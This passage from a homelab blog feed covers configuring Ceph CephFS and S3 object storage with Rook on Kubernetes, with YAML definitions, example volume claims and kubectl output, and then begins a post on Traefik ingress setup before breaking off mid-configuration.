when a Kubernetes <a href="https://kubernetes.io/docs/concepts/storage/persistent-volumes/">persistent volume</a>
is removed. With the setting <code>Retain</code>, the underlying Ceph volume is retained
and needs to be removed separately. As I&rsquo;m still a bit unfamiliar with k8s,
I find it prudent to set <code>Retain</code> on all of my storage classes. &#x1f605;</p>
<p>Next, the <code>allowVolumeExpansion</code> option does what it says: It allows existing
volumes to be enlarged. The <code>volumeBindingMode</code> option defines when the volume
is created. With the <code>Immediate</code> value, the Ceph volume will be created when
the PVC is deployed in the cluster. With the <code>WaitForFirstConsumer</code> value,
the Ceph volume would only be created once the first pod using it is created.</p>
<p>Then there are the parameters. Most of them are simply defaults I copied over from
the example <code>values.yaml</code> file. The important one is the <code>imageFeatures</code> setting.
It contains a list of options for newly created Ceph RBDs.
Details on these options can be found <a href="https://docs.ceph.com/en/latest/man/8/rbd/#cmdoption-rbd-image-feature">here</a>.</p>
<h2 id="cephfs">CephFS</h2>
<p>Next comes the CephFS pool and storage class. <a href="https://docs.ceph.com/en/latest/cephfs/">CephFS</a>
is a POSIX-compliant file system. It can be mounted on any Linux machine and
supports permissions and ACLs. It is a bit more complex than RBDs as a consequence,
as all the file metadata needs to be handled. For that reason, it needs an
additional set of daemons, the MDS (Metadata Server). It allows concurrent access,
and that&rsquo;s what I&rsquo;m mostly using it for in my setup. I&rsquo;m using it to share the
volume with my Linux ISOs between my Linux ISO media server and my desktop, for example.
I&rsquo;m also using it for cases where multiple Nomad jobs need to access the same
volume, RWX volumes in CSI parlance. It will serve the same purpose in my
k8s cluster.</p>
<p>As it allows concurrent access and hence suffers from the cost of networked
coordination, I only have a single pool for it, located on my HDDs, as I
don&rsquo;t expect access to it to be particularly fast anyway.</p>
<p>Here&rsquo;s the definition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephFileSystems</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadataPool</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dataPools</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bulk</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">preserveFilesystemOnDelete</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadataServer</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">activeCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">activeStandby</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;250m&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">priorityClassName</span>: <span style="color:#ae81ff">system-cluster-critical</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                        - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pool</span>: <span style="color:#ae81ff">bulk</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowVolumeExpansion</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeBindingMode</span>: <span style="color:#e6db74">&#34;Immediate&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/fstype</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-node</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span></code></pre></div><p>In contrast to RBDs, I need two pools here, one for metadata and one for the
actual data. The setup of the two pools is similar to the RBD pool: replication
of &ldquo;2&rdquo;, with <code>host</code> as the failure domain. Via the
<code>preserveFilesystemOnDelete</code> option, I&rsquo;m also again making sure that deleting
the file system CRD does not delete the file system in Ceph, just to protect
myself from my own stupidity.
I also need to set up the MDS deployment here, which I do the same way as for the
other Ceph daemons, meaning with a toleration of the Ceph taint and an affinity
for my Ceph nodes.</p>
<p>The storage class is pretty much the same as before, with the addition of the
<code>pool</code> option, which denotes the data pool to be used.</p>
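<p>To later request an RWX volume from this class, a PVC would look something like the following sketch; the name, namespace and size are placeholders:</p>
<pre tabindex="0"><code class="language-yaml" data-lang="yaml">apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: shared-data
  namespace: tests
spec:
  accessModes:
    # RWX: multiple pods may mount the volume at the same time.
    - ReadWriteMany
  storageClassName: homelab-fs
  resources:
    requests:
      storage: 10Gi
</code></pre>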
<h2 id="rgwss3">RGWs/S3</h2>
<p>Finally, S3. I&rsquo;m using it wherever I need a &ldquo;data lake&rdquo; type storage. It doesn&rsquo;t
have volumes, it doesn&rsquo;t need to be mounted, I can just push data into it with
a variety of tools until my physical disks are full. I found Ceph&rsquo;s S3 to be
pretty well supported and have yet to meet any application that wants S3 storage
but won&rsquo;t work with Ceph. The only thing one might have to do is make sure
that the client&rsquo;s <code>path-based</code> (path-style) addressing option is enabled, as many
S3 clients default to addressing buckets via DNS subdomains rather than via the URL path.
I&rsquo;m using S3 for a variety of applications, ranging from Nextcloud to restic
backups.</p>
<p>Similar to CephFS, S3 requires an additional set of daemons, the Rados Gateways (RGW).
I have diverged a bit from my current setup here. In my baremetal cluster,
Consul agents are running on the Ceph hosts, announcing a service for my S3
storage. The RGWs receive my Let&rsquo;s Encrypt cert and get accessed directly
from the outside, and via the Consul Connect mesh network from services in my
Nomad cluster.
For now, I decided to keep the Rook RGWs cluster-internal and only accessible through
my ingress, to simplify my setup a bit. I will have to see how well that
performs, for example during backups.</p>
<p>Here is the definition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephObjectStores</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadataPool</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dataPool</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">preservePoolsOnDelete</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">gateway</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">hostNetwork</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">preferredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">weight</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">preference</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                        - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;500m&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;512Mi&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeBindingMode</span>: <span style="color:#e6db74">&#34;Immediate&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">host</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span></code></pre></div><p>First on the agenda is, again, the pool setup. Like CephFS, RGWs need metadata
and data pools. They will even create additional pools for indexes and such.
Same strategy as before, metadata on SSDs, data on HDDs and replication factor
of &ldquo;2&rdquo;.
And also similar to the other two storage types, I&rsquo;m preserving pools on deletion,
meaning that when the object store&rsquo;s CRD manifest is removed, the Ceph pools are kept
until they are deleted manually.</p>
<p>Then the setup for the RGW daemons themselves. Again, very similar to before.
Two instances, and tolerations and affinity for my Ceph nodes to allow them to
run there.</p>
<p>The storage class is again nothing special. The ingress is also pretty standard,
going through my proxy via the HTTPS entrypoint and hosted at <code>s3.example.com</code>.
I might add a <code>LoadBalancer</code> service here if I find that I don&rsquo;t like the performance
of putting all cluster-external S3 traffic through the ingress.</p>
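<p>Buckets themselves can later be requested declaratively as well, via Rook&rsquo;s <code>ObjectBucketClaim</code> CRD. I haven&rsquo;t deployed any of these yet, but going by the Rook docs, a claim against this object store would look roughly like this, with made-up names:</p>
<pre tabindex="0"><code class="language-yaml" data-lang="yaml">apiVersion: objectbucket.io/v1alpha1
kind: ObjectBucketClaim
metadata:
  name: test-bucket
  namespace: tests
spec:
  # Rook appends a random suffix to avoid bucket name collisions.
  generateBucketName: test-bucket
  storageClassName: rgw-bulk
</code></pre>
<p>Rook should then create the bucket and put the endpoint and credentials into a ConfigMap and a Secret of the same name in that namespace, ready to be consumed by a workload.</p>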
<p>And that&rsquo;s it. With all of these deployed, the operator will create the necessary
pods and pools as well as storage classes, and we&rsquo;re ready to make use of it.
At this point I haven&rsquo;t actually used the cluster yet, but I just figured that
I should provide at least some examples.</p>
<p>So let&rsquo;s see whether this entire setup actually works. &#x1f605;</p>
<h1 id="examples">Examples</h1>
<p>If you&rsquo;ve made it through the 22 minutes of reading time Hugo currently shows,
you probably already know how storage in k8s works, so I will be brief. For
storage management, k8s has the <a href="https://github.com/container-storage-interface/spec/blob/master/spec.md">CSI</a>,
a spec for how a workload scheduler communicates with a storage provider to
get volumes. In k8s, the story of a storage volume begins with a persistent
volume claim (<a href="https://kubernetes.io/docs/concepts/storage/persistent-volumes/">PVC</a>).</p>
<p>For my specific Ceph Rook setup, that might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-claim</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">tests</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/usage</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">2Gi</span>
</span></span></code></pre></div><p>This will create a persistent volume of size 2 GiB, with the <code>rbd-fast</code> class,
meaning Ceph will create the volume on my SSD pool.</p>
<p>This took quite a while to provision, about 7 minutes. I&rsquo;m pretty sure that&rsquo;s
not normal, but this post is already long enough, so I will investigate that
later. &#x1f609;</p>
<p>In the end, this produces a persistent volume claim like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n tests pvc
</span></span><span style="display:flex;"><span>NAME         STATUS   VOLUME                                     CAPACITY   ACCESS MODES   STORAGECLASS   AGE
</span></span><span style="display:flex;"><span>test-claim   Bound    pvc-cb5e3aaa-1292-4bbc-9a9e-309be90ee30d   2Gi        RWO            rbd-fast       7m49s
</span></span></code></pre></div><p>The volume itself can also be shown:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>k -n tests get pv
</span></span><span style="display:flex;"><span>NAME                                       CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS   CLAIM              STORAGECLASS   REASON   AGE
</span></span><span style="display:flex;"><span>pvc-cb5e3aaa-1292-4bbc-9a9e-309be90ee30d   2Gi        RWO            Retain           Bound    tests/test-claim   rbd-fast                7m49s
</span></span></code></pre></div><p>An important piece of information is also shown in the volume&rsquo;s <code>describe</code> output:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>Source:
</span></span><span style="display:flex;"><span>    Type:              CSI <span style="color:#f92672">(</span>a Container Storage Interface <span style="color:#f92672">(</span>CSI<span style="color:#f92672">)</span> volume source<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    Driver:            rook-ceph.rbd.csi.ceph.com
</span></span><span style="display:flex;"><span>    FSType:            ext4
</span></span><span style="display:flex;"><span>    VolumeHandle:      0001-000c-rook-cluster-0000000000000002-b4e37061-2df1-4a15-8a8d-93f3854cecbb
</span></span><span style="display:flex;"><span>    ReadOnly:          false
</span></span><span style="display:flex;"><span>    VolumeAttributes:      clusterID<span style="color:#f92672">=</span>rook-cluster
</span></span><span style="display:flex;"><span>                           imageFeatures<span style="color:#f92672">=</span>layering,exclusive-lock,object-map,fast-diff
</span></span><span style="display:flex;"><span>                           imageName<span style="color:#f92672">=</span>csi-vol-b4e37061-2df1-4a15-8a8d-93f3854cecbb
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>The interesting thing is the <code>imageName</code>, because that&rsquo;s the name of the RBD
volume in the Ceph cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rook-ceph rbd ls --long --pool rbd-fast
</span></span><span style="display:flex;"><span>NAME                                          SIZE   PARENT  FMT  PROT  LOCK
</span></span><span style="display:flex;"><span>csi-vol-b4e37061-2df1-4a15-8a8d-93f3854cecbb  <span style="color:#ae81ff">2</span> GiB            <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>I will leave it at this for the time being. The CephFS based volume will be
pretty similar, and the next step in the migration is moving my S3 buckets over
to Rook from the baremetal cluster, so those will get their very own article.</p>
<h1 id="kubectl-plugin">kubectl plugin</h1>
<p>Before I finish this, I would like to point you to the excellent <code>kubectl</code> plugin
for Rook. It can be found <a href="https://github.com/rook/kubectl-rook-ceph">here</a>.</p>
<p>It provides an easy-to-use interface to the Rook Ceph cluster, without having
to configure admin credentials on the machine you would like to use it from. The
kubectl certs are enough.
With it, I can access the full <code>ceph</code> CLI, as well as other tools, like <code>rbd</code>.</p>
<p>The main advantage for me is that I won&rsquo;t have to set up aliases for the
two Ceph clusters I&rsquo;m managing from the same machine. No danger of fat-fingering
the wrong cluster. &#x1f389;</p>
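<p>In case you want to give it a try, installation and usage look roughly like this.
I&rsquo;m assuming an installation via krew here, check the plugin&rsquo;s README for other options:</p>
<pre tabindex="0"><code># Install the plugin (assumes krew is already set up)
kubectl krew install rook-ceph

# Then run Ceph tooling against the Rook cluster, authenticated
# only via the normal kubectl credentials
kubectl rook-ceph ceph status
kubectl rook-ceph rbd ls --long --pool rbd-fast
</code></pre>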
<h1 id="conclusion">Conclusion</h1>
<p>Phew. Congrats to the both of us, dear reader, for getting through this. &#x1f605;
Overall, I liked the experience of setting up Rook, especially that I can now
configure at least some aspects of my Ceph cluster declaratively and put them
under version control.</p>
<p>One question I&rsquo;ve been wondering about: How would this have gone if this Rook
setup was my first contact with Ceph? Would it have been equally easy and clear?</p>
<p>I&rsquo;m honestly not sure. As I&rsquo;ve noted in the intro, I find my Ceph cluster
surprisingly low maintenance, but this setup has again shown me how many moving
parts there are. At least from my PoV, Rook does a good job abstracting a lot of
that.</p>
<p>But I&rsquo;m not sure how comfortable I would have been with these abstractions if
I hadn&rsquo;t run a Ceph cluster for almost three years now.</p>
<h1 id="update-on-2024-01-21">Update on 2024-01-21</h1>
<p>A short update on this article: The setup as described here leads to the
PG autoscaler not working. If that is something you need, I&rsquo;ve written a
follow-up article with a fix <a href="https://blog.mei-home.net/posts/ceph-rook-crush-rules/">here</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 3: Ingress with Traefik</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/</link>
      <pubDate>Sat, 06 Jan 2024 02:00:43 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/</guid>
      <description>Setting up my k8s cluster ingress with Traefik</description>
      <content:encoded><![CDATA[<p>Wherein I talk about the Ingress setup for my Homelab&rsquo;s k8s cluster with Traefik.</p>
<p>This is part four of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>After the initial setup of some infrastructure like <code>external-dns</code> and <code>external-secrets</code>,
I went to work on the <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">Ingress</a>
implementation for my cluster.</p>
<p>I chose <a href="https://traefik.io/traefik/">Traefik</a> as my Ingress controller. This
was mostly driven by the fact that I&rsquo;m already using Traefik as the proxy in
front of my current Nomad cluster, and I&rsquo;ve become quite familiar with it.</p>
<p>One big advantage of Traefik is the extensive support for a wide array of
what they call <a href="https://doc.traefik.io/traefik/providers/overview/">Configuration Providers</a>.
In my current Nomad setup, I&rsquo;m making use of the Consul provider. In comparison
to software like Nginx or Apache, I can configure all proxy related config
in the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/service">service block</a>
of my Nomad jobs, as labels on the Consul service definition. This allows for
centralization of the entire config related to a specific service, instead of
having two places: The config for the service&rsquo;s deployment, and the proxy config.</p>
<h1 id="networking-options">Networking options</h1>
<p>While planning my k8s cluster, I considered two different ways of doing
networking for the Ingress. The first one is to simply have the proxy using the
host&rsquo;s networking. This is the setup that I&rsquo;m currently working with in my
Nomad setup. I&rsquo;ve got the Traefik job pegged to a single host, and then I&rsquo;ve got
a hard-coded <code>A</code> entry in my DNS pointing to that machine. Traefik then listens on
port 443 and so forth. Then I&rsquo;m adding <code>CNAME</code> entries to DNS for other services
running through that proxy.</p>
<p>I set Traefik up the same way during my k8s experiments. But this has one large
downside: High availability. If the ingress host goes down, not only is Traefik
down, but also all services served through it. That doesn&rsquo;t bother me too much,
but with k8s, I had a different option: <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">Services of type LoadBalancer</a>.
This has the advantage that I no longer have to restrict Traefik to a specific
host to get a stable IP to point all the DNS entries at. Instead, the stable
IP is now supplied by Cilium, which also announces routes to those IPs to my
router.</p>
<p>The one downside of the <code>LoadBalancer</code> approach is that source IPs are not
necessarily preserved. This makes functionality like IP allow lists in Traefik
pretty useless.
The fix for this is to use <code>externalTrafficPolicy: Local</code> on the Service. This
config ensures that Cilium announces only the IPs of the hosts which currently
run a Traefik pod, and then the cluster-internal, source NAT&rsquo;ed routing does not
apply, and source IPs are preserved.</p>
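<p>For reference, on a plain <code>Service</code> manifest this is roughly what that
looks like (the name and ports are just placeholders):</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Service
metadata:
  name: ingress-proxy          # placeholder name
spec:
  type: LoadBalancer
  # only nodes that actually run a proxy pod answer for the LB IP,
  # so the source IP survives
  externalTrafficPolicy: Local
  selector:
    app: ingress-proxy
  ports:
    - name: websecure
      port: 443
      targetPort: 8000
</code></pre>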
<h1 id="deployment">Deployment</h1>
<p>I&rsquo;m using the <a href="https://github.com/traefik/traefik-helm-chart">official Helm chart</a>
for my deployment. Currently, I&rsquo;m only running a single replica, but that might
change in the future.</p>
<p>I will go through my <code>values.yaml</code> file piece-by-piece, to make the explanation
a bit more manageable.</p>
<p>Let&rsquo;s start with the values for the Deployment itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">deployment</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">healthchecksPort</span>: <span style="color:#ae81ff">4435</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">additionalArguments</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;--ping.entryPoint=health&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;--providers.kubernetesingress.ingressendpoint.hostname=ingress-k8s.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">logs</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">general</span>:
